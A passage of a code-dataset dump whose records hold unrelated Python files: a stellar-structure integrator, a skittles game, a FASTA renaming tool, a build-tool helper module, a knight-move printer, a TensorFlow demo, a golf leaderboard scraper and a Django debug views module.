dp_dr = -rho(y[1])*G_cu*y[0]/(r**2)\n return [dm_dr,dp_dr]\n\n\n# initial conditions\nV0 = 4./3*pi*r_c**3\nm_0 = rho_c*V0\nprint(m_0,m_c)\n\ndef int_eul(nsteps,r_c,dr,y0):\n r = r_c\n dr = dr\n y = array(y0)\n pp = []; mp = []; rp = [] \n for i in range(nsteps):\n rhs = f_rhs(y,r)\n y += array(rhs)*dr\n r += dr\n mp.append(y[0])\n pp.append(y[1])\n rp.append(r)\n return mp, pp, rp\n\ny0=[m_0,P_c]\ndr = 0.01\nsteps = 2500\nmass,pressure,radius = int_eul(steps,r_c,dr,y0)\nplot(mass,radius)\n","sub_path":"examples/int_star.py","file_name":"int_star.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"5622262","text":"from turtle import *\r\nquilles=[[0,10],[13,15]]\r\ndef printquilles(quilles):\r\n for i in range (0,quilles[0][0]):\r\n print(\"_\")\r\n for pointeur in range(len(quilles)):\r\n if pointeur>0:\r\n for i in range(quilles[pointeur-1][1],quilles[pointeur][0]):\r\n print(\"_\",end=\"\")\r\n for k in range(quilles[pointeur][0],quilles[pointeur][1]):\r\n print(\"|\",end=\"\")\r\n\r\nwhile len(quilles)>0:\r\n a=textinput(\"Jeu des quilles\",\"Où voulez-vous jouer?\")\r\n nlignejeu=int(a[:a.find(\":\")])\r\n printquilles(quilles)\r\n","sub_path":"quilles/liste de quilles.py","file_name":"liste de 
quilles.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"516963517","text":"#!/usr/bin/env python3\nimport re, sys\n\ndef rename_fasta(infile, outfile, resp, regex=None, split_char=None, group=None, n_groups=None):\n # Build RE\n if resp == 1:\n assert split_char is not None and group is not None and n_groups is not None, \"Something went wrong\"\n grps = [i+1 for i in range(n_groups)]\n re_string = '>{}(.*)$'.format(\"(.*?)[{}]\".format(split_char)*(n_groups-1))\n re_compiled = re.compile(re_string, re.M)\n grps.remove(group)\n else:\n re_compiled = re.compile(regex)\n grps = [1,2]\n grps.remove(group)\n\n # Rename Seqs\n with open(infile, 'r') as f:\n with open(outfile, 'w+') as out:\n for line in f:\n if line.startswith('>'):\n match = re_compiled.match(line)\n new_string = '>{}_{}\\n'.format(match.group(group), \"_\".join([match.group(i) for i in grps]))\n out.write(new_string)\n else:\n out.write(line)\n\ndef rename_dialogue(file_name):\n # User Interaction\n print(\"Reformat FASTA file for use with TreeFix-VP\")\n print(\"-\"*43)\n\n print(\"In order to properly calculate transmission cost, each sequence name must be formatted as 'HOST_UNIQUE-STRAIN-ID'. Select how to find the host name within the current sequence names:\")\n print(\"1. Split on character\\n2. Use regular expression\")\n while True:\n resp = input()\n try:\n resp = int(resp)\n except ValueError:\n print(\"Invalid input, please enter 1 or 2\")\n continue\n if resp == 1 or resp == 2:\n break\n else:\n print(\"Invalid input, please enter 1 or 2\")\n continue\n\n if resp == 1:\n regex = None\n special_chars = ['.', '^', '$', '*', '+', '?', '{', '}', '[', ']']\n while True:\n split_char = input(\"Enter split character: \")\n if len(split_char) > 1:\n print(\"Invalid input, please enter a single character\")\n continue\n if split_char in special_chars:\n split_char = '\\\\{}'.format(split_char)\n break\n while True:\n n_groups = input(\"Number of groups in sequence name: \")\n try:\n n_groups = int(n_groups)\n except ValueError:\n print(\"Invalid input\")\n continue\n break\n while True:\n group = input(\"Host name appears in group number: \")\n try:\n group = int(group)\n except ValueError:\n print(\"Invalid input\")\n continue\n if group > n_groups or group <= 0:\n print(\"Please enter a valid group number\")\n continue\n break\n\n if resp == 2:\n split_char = None\n group = None\n while True:\n regex = input(\"Enter regular expression with groups for host name and unique ID: \")\n try:\n re.compile(regex.strip(), re.M)\n break\n except:\n print(\"Invalid input, please enter a valid regular expression\")\n continue\n while True:\n group = input(\"Host name is group 1 or 2?: \")\n try:\n group = int(group)\n except ValueError:\n print(\"Invalid input\")\n continue\n if group == 1 or group == 2:\n break\n else:\n print(\"Please enter 1 or 2\")\n continue\n n_groups = 2\n\n rename_fasta(file_name, '{}.formatted.seqs'.format(file_name), resp, regex=regex, split_char=split_char, group=group, n_groups=n_groups)\n return \"Done\"\n\ndef short_help():\n print(\"Usage: ./tree_utils [operation] [sequence file path]\")\n print(\"Operations: '{}'\".format(\"', '\".join(ops_dict)))\n sys.exit(1)\n\ndef long_help():\n print(\"Usage: ./tree_utils [operation] [sequence file path]\\n\")\n print(\"rename: formats multiple sequence alignment in FASTA format for use with TreeFix-VP\")\n print(\"help: displays this message\")\n 
sys.exit(1)\n\ndef main():\n\n try:\n op = sys.argv[1]\n except:\n short_help()\n if op == \"help\":\n long_help()\n try:\n tf = sys.argv[2]\n except:\n short_help()\n\n print(\"Operation = {}\".format(op))\n print(\"Tree File = {}\".format(tf))\n\n print(ops_dict.get(op, lambda x: 'Invalid Operation')(tf))\n\nif __name__ == \"__main__\":\n ops_dict = {\n \"rename\": rename_dialogue,\n \"help\": long_help\n }\n main()\n\n","sub_path":"lib/seq_utils.py","file_name":"seq_utils.py","file_ext":"py","file_size_in_byte":4620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"77863597","text":"\"\"\"Utilities for use in tools.\"\"\"\n\nimport logging\nimport os.path\nimport re\nimport sys\nfrom contextlib import contextmanager\n\nfrom menhir.fileutils import load_yaml\nfrom menhir.tool import load_tool\n\nlog = logging.getLogger(__name__)\n\nOK = {\n 'status': 'ok'\n}\n\nFAIL = {\n 'status': 'fail'\n}\n\nNOTHING_TO_DO = {\n 'status': 'nothing_to_do'\n}\n\nNON_WORD_PATTERN = re.compile(r'\\W')\n\n\n@contextmanager\ndef package_script(resource_path, resource_package=\"menhir\"):\n \"\"\"Execute a block of code with the given script from the package.\n\n Yields a file like object that is the script written onto the filesystem.\n \"\"\"\n import tempfile\n import pkg_resources\n import stat\n from os import chmod, remove\n\n script = pkg_resources.resource_string(resource_package, resource_path)\n fname = None\n try:\n with tempfile.NamedTemporaryFile(\"wb\", delete=False) as f:\n fname = f.name\n f.write(script)\n chmod(fname, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)\n yield f\n finally:\n remove(fname)\n\n\n@contextmanager\ndef working_dir(path):\n \"\"\"Execute a block of code within the given working dir.\"\"\"\n import os\n dirname = os.getcwd()\n log.debug('Change working dir from %s to %s', dirname, path)\n try:\n os.chdir(path)\n yield\n finally:\n os.chdir(dirname)\n\n\nENV_TO_REMOVE = [\n 'PWD',\n 'PYENV_DIR',\n 'PYENV_HOOK_PATH',\n 'PYENV_SHELL',\n 'PYENV_VERSION',\n 'PYENV_VIRTUALENV_INIT',\n]\n\n\ndef tool_env():\n \"\"\"Return the default tool environment dict.\"\"\"\n import os\n import os.path\n\n default_pyenv_root = os.path.join(os.getenv(\"HOME\"), \".pyenv\")\n env = {\n \"PYENV_ROOT\": default_pyenv_root,\n }\n\n env.update(os.environ)\n\n for k in ENV_TO_REMOVE:\n env.pop(k, None)\n return env\n\n\ndef call(cmd, *args, **kwargs):\n \"\"\"Call a subprocess, returning a menhir result.\"\"\"\n import subprocess\n res = subprocess.call(cmd, *args, **kwargs)\n if res:\n return FAIL\n return OK\n\n\ndef slugify(s, length=None, replace=NON_WORD_PATTERN):\n s = re.sub(replace, \"_\", s)\n if length:\n s = s[:length]\n return s\n\n\n@contextmanager\ndef run_if(cond, phase_name, path):\n if cond:\n log.info(\n 'Running %(phase)s in %(path)s',\n {'phase': phase_name, 'path': path}\n )\n yield True\n else:\n yield False\n log.info(\n 'Not running %(phase)s in %(path)s',\n {'phase': phase_name, 'path': path}\n )\n\n\ndef call_tool_chain(path, info, remainder):\n result = OK\n while remainder:\n tool_name = remainder.pop(0)\n tool = load_tool(tool_name)\n\n parser = tool.arg_parser(add_help=False, prog=tool_name)\n tool_args, unknown = parser.parse_known_args(\n remainder,\n # namespace=copy(args)\n )\n log.debug('tool_args %s: %s', tool_name, tool_args)\n if unknown:\n log.debug('unknown argument: %s', unknown)\n parser.print_help()\n sys.exit(0 if remainder == ['-h'] else 1)\n\n result = tool.execute_tool(path, info, tool_args)\n\n 
remainder = getattr(tool_args, 'remainder', None)\n log.debug('remainder after %s: %s', tool_name, remainder)\n\n if result['status'] != 'ok':\n return result\n\n return result\n\n\ndef argv_to_dict(arg_names, arg_values):\n \"\"\"Convert vectors of arg names and arg values to a dict.\n\n returns `None, Fail` if there are too few arguments.\n \"\"\"\n if len(arg_names) > len(arg_values):\n return None\n\n return {k: v for (k, v) in zip(arg_names, arg_values)}\n\n\ndef has_self_or_dependent_changes(changed):\n return (\n changed is None or\n changed.get('self') or\n changed.get('dependents')\n )\n\n\ndef load_menhir_state():\n p = 'menhir-state.yaml'\n if os.path.exists(p):\n return load_yaml(p)\n\n\ndef changed_state(info):\n changed = info.get('changed')\n if changed is None:\n changed = load_menhir_state()\n return changed\n","sub_path":"menhir/tool_utils.py","file_name":"tool_utils.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"615451555","text":"position = list(input())\r\nletters = ['0', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\r\n\r\n\r\ndef possible_turns(cell):\r\n\r\n for i in range(1, 9):\r\n if letters[i] == position[0]:\r\n for Y1 in range(1, 9):\r\n for Y2 in range(1, 9):\r\n x1 = i\r\n x2 = int(cell[1])\r\n y1 = Y1\r\n y2 = Y2\r\n dx = abs(int(x1 - x2))\r\n dy = abs(int(y1 - y2))\r\n if dx == 1 and dy == 2 or dx == 2 and dy == 1:\r\n print(letters[Y1], Y2)\r\n\r\n\r\npossible_turns(position)\r\n","sub_path":"Ruben/lesson_6.py","file_name":"lesson_6.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"354055338","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\nimport tensorflow as tf\n\n# Normal Loading\na = tf.Variable(10, name='a')\nb = tf.Variable(21, name='b')\nz = tf.add(a, b)\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n writer = tf.summary.FileWriter('./my_graph/l2', sess.graph)\n for _ in range(10):\n sess.run(z)\n writer.close()\n\n","sub_path":"Tensorflow_lazyLoading.py","file_name":"Tensorflow_lazyLoading.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"635791603","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\n\npage = requests.get(\"http://www.espn.com/golf/leaderboard\")\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n\nary = []\nname_array = soup.find_all('a', class_ = 'full-name')\nuo_array = soup.find_all('td', class_ = 'relativeScore')\nts_array = soup.find_all('td', class_ = 'totalScore in post')\nlength = len(name_array)\n\nfor i in range(0, length):\n full_name = name_array[i].get_text()\n try:\n under_over = int(uo_array[i].get_text())\n except ValueError:\n under_over = uo_array[i].get_text()\n total_score = int(ts_array[i].get_text())\n ary.append({'playerName': full_name, 'score': total_score, 'overUnder': under_over})\nprint(ary)\n\nfile = open(\"leaderboard_data.json\", \"w\")\noutput = ary\njson.dump(output, file)\nfile.close()\n","sub_path":"src/data/getLeaderboard.py","file_name":"getLeaderboard.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"394147000","text":"#! 
/usr/bin/env python3\n# coding=utf-8\n\n\"\"\"\n< For Rex Debug >\n\"\"\"\n\nfrom django.shortcuts import render,render_to_response\nfrom django.http import HttpResponse,HttpResponseRedirect,HttpResponseNotFound\nimport json,time,threading,copy,os,re\nfrom pprint import pprint as pp, pformat\n\nfrom AcisDB import log\nfrom AcisDB import vcore\n\nimport logging\nmlogger = logging.getLogger(__name__).info\n\nclass RexExcelProvider(vcore.Provider):\n\n from .test_cookies_of_rex import (show_time_first_from_excel,\n show_time_second_from_excel,\n show_time_third_from_excel,\n show_time_fourth_from_excel)\n\n self_test = {\n \"first\" : show_time_first_from_excel,\n \"second\" : show_time_second_from_excel,\n \"third\" : show_time_third_from_excel,\n \"fourth\" : show_time_fourth_from_excel,\n }\n\n def __init__(self,platform = \"SD55\", test_version = \"first\"):\n\n self.platform = platform\n self.test_version = test_version\n\n def get_data(self):\n t = RexExcelProvider.self_test[self.test_version](self.platform)\n\n logger_to_excel = logging.getLogger(__name__ + '.from_excel')\n logger_to_excel.info(pformat(t))\n\n return t\n\n @property\n def formatted_rawdata(self):\n return self.get_data()\n\nclass RexJiraProvider(vcore.Provider):\n\n from .test_cookies_of_rex import (show_time_first_from_jira,\n show_time_second_from_jira,\n show_time_third_from_jira,\n show_time_fourth_from_jira,\n\n follow_second_excel_update_jira,\n follow_third_excel_update_jira ,\n follow_fourth_excel_update_jira,\n )\n\n self_test = {\n \"first\" : show_time_first_from_jira,\n \"second\" : show_time_second_from_jira,\n \"third\" : show_time_third_from_jira,\n \"fourth\" : show_time_fourth_from_jira,\n\n \"follow01\" : follow_second_excel_update_jira,\n \"follow02\" : follow_third_excel_update_jira ,\n \"follow03\" : follow_fourth_excel_update_jira,\n }\n\n def __init__(self, platform, test_version):\n self.platform = platform\n self.test_version = test_version\n\n def get_data(self):\n t = RexJiraProvider.self_test[self.test_version](self.platform)\n\n logger_to_jira = logging.getLogger(__name__ + '.from_jira')\n logger_to_jira.info(pformat(t))\n\n return t\n\n @property\n def formatted_rawdata(self):\n return self.get_data()\n\nclass ExcelProvider(vcore.Provider):\n\n from .test_cookies_of_rex import (\n test_get_excel_data_first,\n test_get_excel_data_second,\n test_get_excel_data_third,\n test_get_excel_data_fourth,\n )\n\n self_test = {\n \"first\" : test_get_excel_data_first,\n \"second\" : test_get_excel_data_second,\n \"third\" : test_get_excel_data_third,\n \"fourth\" : test_get_excel_data_fourth,\n }\n\n def __init__(self,platform = \"SD55\", test_version = \"first\"):\n\n self.platform = platform\n self.test_version = test_version\n\n def get_data(self):\n t = ExcelProvider.self_test[self.test_version](self.platform)\n\n logger_to_excel = logging.getLogger(__name__ + '.from_excel')\n logger_to_excel.info(pformat(t))\n\n return t\n\n @property\n def formatted_rawdata(self):\n \"\"\"\n For Excel Data:\n >>> [\n >>> ...\n >>> {\n >>> \"PLATFORM\" : \"\",\n >>> \"ERD_ID\" : \"\",\n >>> \"excel\" : {\n >>> 'erd_id' : \"\",\n >>> 'category' : \"\",\n >>> 'title' : \"\",\n >>> 'description' : \"\",\n >>> 'product_priority' : \"\",\n >>> 'author' : \"\",\n >>> 'version' : \"\",\n >>> 'platform' : \"\",\n >>> }\n >>> ...\n >>> ]\n \"\"\"\n return self.get_data()\n\nclass JiraProvider(vcore.Provider):\n\n from .test_cookies_of_rex import (\n test_get_jira_data_first,\n test_get_jira_data_second,\n 
test_get_jira_data_third,\n )\n\n self_test = {\n \"first\" : test_get_jira_data_first,\n \"second\" : test_get_jira_data_second,\n \"third\" : test_get_jira_data_third,\n }\n\n def __init__(self, platform, test_version):\n self.platform = platform\n self.test_version = test_version\n\n def get_data(self):\n t = JiraProvider.self_test[self.test_version](self.platform)\n\n logger_to_jira = logging.getLogger(__name__ + '.from_jira')\n logger_to_jira.info(pformat(t))\n\n return t\n\n @property\n def formatted_rawdata(self):\n \"\"\"\n For JIRA Ticket Data:\n >>> [\n >>> ...\n >>> {\n >>> \"PLATFORM\" : \"\",\n >>> \"ERD_ID\" : \"\",\n >>> \"jira\" : {\n >>> 'HLD' : \"\",\n >>> 'status' : \"\",\n >>> 'l1_jira' : \"\",\n >>> 'l2_jira' : \"\",\n >>> 'bug_jiras' : \"\",\n >>> 'platform' : \"\",\n >>> 'workload' : \"\",\n\n >>> 'F_casetree' : [\n >>> ...\n >>> {\n >>> 'case_name' : \"\",\n >>> 'case_age' : \"\",\n >>> 'F_report_path': \"\",\n >>> },\n >>> ... ]\n >>> }\n >>> ...\n >>> ]\n \"\"\"\n return self.get_data()\n\nclass JenkinsProvider(vcore.Provider):\n\n from .test_cookies_of_rex import (\n show_time_jenkins_test_01,\n show_time_jenkins_test_02,\n show_time_jenkins_test_03,\n show_time_jenkins_test_04,\n show_time_jenkins_test_05,\n show_time_jenkins_test_06,\n show_time_jenkins_test_07,\n )\n\n self_test = {\n \"test01\" : show_time_jenkins_test_01,\n \"test02\" : show_time_jenkins_test_02,\n \"test03\" : show_time_jenkins_test_03,\n \"test04\" : show_time_jenkins_test_04,\n \"test05\" : show_time_jenkins_test_05,\n \"test06\" : show_time_jenkins_test_06,\n \"test07\" : show_time_jenkins_test_07,\n }\n\n def __init__(self, platform, test_version):\n self.platform = platform\n self.test_version = test_version\n\n def get_data(self):\n t = JenkinsProvider.self_test[self.test_version](self.platform)\n\n logger_to_jenkins = logging.getLogger(__name__ + '.from_jenkins')\n logger_to_jenkins.info(pformat(t))\n # pp(t)\n # assert False,'hope'\n\n return t\n\n @property\n def formatted_rawdata(self):\n \"\"\"\n For Jenkins Test Data:\n NOTE: For jenkins data, ONLY one element for list.\n\n >>> [{\n >>> \"PLATFORM\" : \"\",\n >>> \"jenkins\" : {\n >>> 'IR_casetree' : {\n >>> 'ACIS_A_S_Test_Temp_Volt' : {\n >>> 'fw_version' : \"\",\n >>> 'test_result' : \"\",\n >>> 'test_log' : \"\",\n >>> 'test_date' : \"\",\n >>> 'IR_report_path' : \"\",\n >>> },\n >>> 'ACIS_A_S_Test_Temp_ssss' : {\n >>> 'fw_version' : \"\",\n >>> 'test_result' : \"\",\n >>> 'test_log' : \"\",\n >>> 'test_date' : \"\",\n >>> 'IR_report_path' : \"\",\n >>> },\n >>> 'ACIS_A_S_Test_Temp_abcd' : {\n >>> 'fw_version' : \"\",\n >>> 'test_result' : \"\",\n >>> 'test_log' : \"\",\n >>> 'test_date' : \"\",\n >>> 'IR_report_path' : \"\",\n >>> },\n >>> ... 
...\n >>> }\n >>> }\n >>> }]\n \"\"\"\n return self.get_data()\n\nclass SubProvider(vcore.Provider):\n\n @property\n def formatted_rawdata(self):\n from .test_cookies_of_rex import random_gen_cookies\n return random_gen_cookies()\n\n\nclass IntegrationExtractor(vcore.Extractor):\n\n @property\n def UI_data(self):\n UI_out = []\n\n data = self._get_data()\n\n out = {}\n for case_name, vs in data['IR_casetree'].items():\n out['platform'] = data['platform']\n out['fw_version'] = data['fw_version']\n\n out['case_name'] = case_name\n out['erd_id'] = vs['erd_id']\n out['test_log'] = vs['test_log']\n out['test_date'] = vs['test_date']\n out['test_result'] = vs['test_result']\n out['IR_report_path'] = vs['IR_report_path']\n UI_out.append(out)\n out = {}\n\n return UI_out\n\n\nclass DefaultExtractor(vcore.Extractor):\n\n def is_vaild_ver(self, spec_ver):\n return True if type(spec_ver) == str and re.match('\\d{2}.\\d{2}', spec_ver) else False\n\n def ext_snapshot(self, platform , spec_ver = \"max\"):\n\n out = []\n data = self._get_data().pop(platform)\n\n for d in data:\n tmp_out = {}\n\n ERD_ID = d\n others = data[d]\n\n if not others['excel']: continue\n\n versions = sorted(list(others['excel'].keys()))\n sub_versions = []\n\n if spec_ver == \"max\":\n lastest_ver = max(versions)\n sub_versions = versions\n else:\n if not self.is_vaild_ver(spec_ver):\n sub_versions = versions\n lastest_ver = max(versions)\n else:\n if spec_ver in versions:\n sub_versions = versions[:versions.index(spec_ver) + 1]\n lastest_ver = spec_ver\n else:\n if spec_ver > max(versions):\n sub_versions = versions\n lastest_ver = max(versions)\n elif spec_ver < min(versions):\n sub_versions = []\n lastest_ver = \"\"\n else:\n for v in versions:\n if spec_ver < v:\n sub_versions = versions[:versions.index(v)]\n lastest_ver = versions[versions.index(v)-1]\n break\n\n # print(\"UI lastest version : <{}> for ERD : [{}]\".format(lastest_ver, ERD_ID))\n\n if lastest_ver == \"\":\n continue\n\n print(\"versions : {}\".format(versions))\n print(\"sub_versions : {}\".format(sub_versions))\n\n tmp_out['version'] = {}\n\n for sv in sub_versions:\n if others['excel'][sv]['description'] == 'blank':\n tmp_out['version'][sv] = 'deactive'\n else:\n tmp_out['version'][sv] = 'active'\n\n print(\"output version dict: {}\".format(tmp_out['version']))\n\n deep_excel = others['excel'][lastest_ver]\n deep_jira = others['jira'][lastest_ver]\n\n # excel part : ERD table partition\n tmp_out['erd_id'] = deep_excel['erd_id']\n tmp_out['platform'] = deep_excel['platform']\n tmp_out['author'] = deep_excel['author']\n tmp_out['category'] = deep_excel['category']\n tmp_out['product_priority'] = deep_excel['product_priority']\n tmp_out['title'] = deep_excel['title']\n tmp_out['description'] = deep_excel['description']\n\n # jira part : ERD table partition\n tmp_out['HLD'] = deep_jira['HLD']\n tmp_out['l1_jira'] = deep_jira['l1_jira']\n tmp_out['l2_jira'] = deep_jira['l2_jira']\n tmp_out['status'] = deep_jira['status']\n tmp_out['workload'] = deep_jira['workload']\n if deep_jira['bug_jiras']:\n tmp_out['bug_jiras'] = deep_jira['bug_jiras'].split(',')\n else:\n tmp_out['bug_jiras'] = []\n\n # jira part : TestCases table partition\n # Now Maybe 'case_age' NOT display\n tmp_out['case_name'] = list(deep_jira['F_casetree'].keys())\n tmp_out['F_report_path'] = []\n for dj in deep_jira['F_casetree']:\n tmp_out['F_report_path'].append(deep_jira['F_casetree'][dj]['F_report_path'])\n\n out.append(tmp_out)\n\n return out\n\n\ndef query_switch(request):\n\n if 
request.method == \"GET\":\n platform = request.GET.get('platform')\n action = request.GET.get('action')\n\n if action == 'ERD_table_version':\n print(\"recored query:\\n{}\\n{}\\n{}\".format(platform,action,request.GET.get('ErdTableVersion')))\n erd_table_version = request.GET.get('ErdTableVersion')\n\n de = DefaultExtractor([platform.upper()])\n vcore.splitter('pick_all', extractor = de )\n\n out = de.ext_snapshot(platform = platform.upper(), spec_ver = erd_table_version)\n\n return render(request, 'LigerUI/ACIS/rex_debug/rex_test_page.htm', {'cookies' : json.dumps(out)})\n\n elif action == 'integration_version':\n fw_version = request.GET.get('FirmwareVersion')\n ie = IntegrationExtractor([platform],fw_version = fw_version)\n vcore.splitter('pick_all', extractor = ie )\n\n return render(request, 'LigerUI/ACIS/integration_page.htm', {'cookies' : json.dumps(ie.UI_data)})\n\n else:\n return HttpResponseNotFound(\"

    Please input 'platform' and 'action' together.

    \")\n\n elif request.method == \"POST\":\n print(\"POST request, but do nothing.\")\n\ndef rex_home(request):\n\n de = DefaultExtractor(['SD55'])\n vcore.splitter('pick_all', extractor = de )\n out = de.ext_snapshot('SD55')\n mlogger(pformat(out))\n return render(request, 'LigerUI/ACIS/rex_debug/rex_test_page.htm', {'cookies' : json.dumps(out)})\n\ndef ERD_9X28_index(request):\n\n de = DefaultExtractor(['9X28'])\n vcore.splitter('pick_all', extractor = de )\n out = de.ext_snapshot('9X28')\n pp(type(out))\n return render(request, 'LigerUI/ACIS/rex_debug/rex_test_page.htm', {'cookies' : json.dumps(out)})\n\ndef ERD_9X40_index(request):\n\n de = DefaultExtractor(['9X40'])\n vcore.splitter('pick_all', extractor = de )\n out = de.ext_snapshot('9X40')\n return render(request, 'LigerUI/ACIS/rex_debug/rex_test_page.htm', {'cookies' : json.dumps(out)})\n\ndef ERD_SD55_index(request):\n\n de = DefaultExtractor(['SD55'])\n vcore.splitter('pick_all', extractor = de )\n out = de.ext_snapshot('SD55')\n return render(request, 'LigerUI/ACIS/rex_debug/rex_test_page.htm', {'cookies' : json.dumps(out)})\n\ndef columns_data_select(request):\n return render(request, 'LigerUI/ACIS/columns_data_select.htm')\n\ndef help(request):\n return render(request, 'LigerUI/ACIS/help.htm', {})\n\ndef about(request):\n return render(request, 'LigerUI/ACIS/about.htm', {})\n\ndef query(request):\n return render(request, 'LigerUI/ACIS/query.htm', {})\n\n\ndef do_save_excel():\n vcore.splitter('save', provider = ExcelProvider())\n\ndef do_save_jira():\n vcore.splitter('save', provider = JiraProvider())\n\ndef do_save_jenkins():\n vcore.splitter('save', provider = JenkinsProvider())\n\ndef do_save_UI():\n pass\n\n\ndef do_save_excel_test1():\n vcore.splitter('save', provider = ExcelProvider(test_version = 'first'))\ndef do_save_excel_test2():\n vcore.splitter('save', provider = ExcelProvider(test_version = 'second'))\ndef do_save_excel_test3():\n vcore.splitter('save', provider = ExcelProvider(test_version = 'third'))\ndef do_save_excel_test4():\n vcore.splitter('save', provider = ExcelProvider(test_version = 'fourth'))\n\ndef do_save_excel_test1_o():\n vcore.splitter('save', provider = ExcelProvider(platform = '9X28', test_version = 'first'))\ndef do_save_excel_test2_o():\n vcore.splitter('save', provider = ExcelProvider(platform = '9X28', test_version = 'second'))\ndef do_save_excel_test3_o():\n vcore.splitter('save', provider = ExcelProvider(platform = '9X28', test_version = 'third'))\ndef do_save_excel_test4_o():\n vcore.splitter('save', provider = ExcelProvider(platform = '9X28', test_version = 'fourth'))\n\n\ndef do_save_jira_test1():\n vcore.splitter('save', provider = JiraProvider(platform = 'SD55', test_version = 'first'))\n\ndef do_save_jira_test2():\n vcore.splitter('save', provider = JiraProvider(platform = 'SD55', test_version = 'second'))\n\ndef do_save_jira_test3():\n vcore.splitter('save', provider = JiraProvider(platform = 'SD55', test_version = 'third'))\n\ndef do_save_jira_test1_o():\n vcore.splitter('save', provider = JiraProvider(platform = '9X28', test_version = 'first'))\ndef do_save_jira_test2_o():\n vcore.splitter('save', provider = JiraProvider(platform = '9X28', test_version = 'second'))\ndef do_save_jira_test3_o():\n vcore.splitter('save', provider = JiraProvider(platform = '9X28', test_version = 'third'))\n\n\n\ndef do_save_jenkins_test1():\n vcore.splitter('save', provider = JenkinsProvider(platform = 'SD55', test_version = 'first'))\ndef do_save_jenkins_test2():\n vcore.splitter('save', provider 
= JenkinsProvider(platform = 'SD55', test_version = 'second'))\ndef do_save_jenkins_test3():\n vcore.splitter('save', provider = JenkinsProvider(platform = 'SD55', test_version = 'third'))\n\ndef do_save_jenkins_test1_o():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X28', test_version = 'first'))\ndef do_save_jenkins_test2_o():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X28', test_version = 'second'))\ndef do_save_jenkins_test3_o():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X28', test_version = 'third'))\n\nsupported_cmds = {\n 'save_excel_data' : do_save_excel,\n 'save_jira_data' : do_save_jira,\n 'save_jenkins_data': do_save_jenkins,\n 'save_UI_data' : do_save_UI,\n\n 'save_excel_data_test1_SD55' : do_save_excel_test1,\n 'save_excel_data_test2_SD55' : do_save_excel_test2,\n 'save_excel_data_test3_SD55' : do_save_excel_test3,\n 'save_excel_data_test4_SD55' : do_save_excel_test4,\n\n 'save_excel_data_test1_9X28' : do_save_excel_test1_o,\n 'save_excel_data_test2_9X28' : do_save_excel_test2_o,\n 'save_excel_data_test3_9X28' : do_save_excel_test3_o,\n 'save_excel_data_test4_9X28' : do_save_excel_test4_o,\n\n 'save_jira_data_test1_SD55' : do_save_jira_test1,\n 'save_jira_data_test2_SD55' : do_save_jira_test2,\n 'save_jira_data_test3_SD55' : do_save_jira_test3,\n\n 'save_jira_data_test1_9X28' : do_save_jira_test1_o,\n 'save_jira_data_test2_9X28' : do_save_jira_test2_o,\n 'save_jira_data_test3_9X28' : do_save_jira_test3_o,\n\n 'save_jenkins_data_test1_SD55' : do_save_jenkins_test1,\n 'save_jenkins_data_test2_SD55' : do_save_jenkins_test2,\n 'save_jenkins_data_test3_SD55' : do_save_jenkins_test3,\n\n 'save_jenkins_data_test1_9X28' : do_save_jenkins_test1_o,\n 'save_jenkins_data_test2_9X28' : do_save_jenkins_test2_o,\n 'save_jenkins_data_test3_9X28' : do_save_jenkins_test3_o,\n}\n\ndef rex_commands(request):\n return render(request, 'LigerUI/ACIS/rex_debug/rex_debug_commands.htm', {'cmds' : list(supported_cmds.keys())})\n\ndef rex_actions_dispatcher(request):\n # Maybe only one.\n for name, cmd in request.GET.items():\n if name == \"command\":\n if cmd and cmd in supported_cmds:\n supported_cmds[cmd]()\n return HttpResponseRedirect(\"/rex_commands/\")\n\n\ndef show_time_do_excel_save():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'first'))\n\ndef show_time_do_jira_save_first():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'first'))\n\ndef show_time_do_jira_save_second():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'second'))\n\ndef show_time_do_jira_save_third():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'third'))\n\n\ndef show_time_do_excel_second_update():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'second'))\n # vcore.splitter('save', provider = RexJiraProvider(platform = 'SD55', test_version = 'follow'))\n\ndef show_time_do_excel_third_update():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'third'))\n # vcore.splitter('save', provider = RexJiraProvider(platform = 'SD55', test_version = 'follow'))\n\ndef show_time_do_excel_fourth_update():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'fourth'))\n # vcore.splitter('save', provider = RexJiraProvider(platform = 'SD55', test_version = 'follow'))\n\ndef show_time_do_follow_excel():\n 
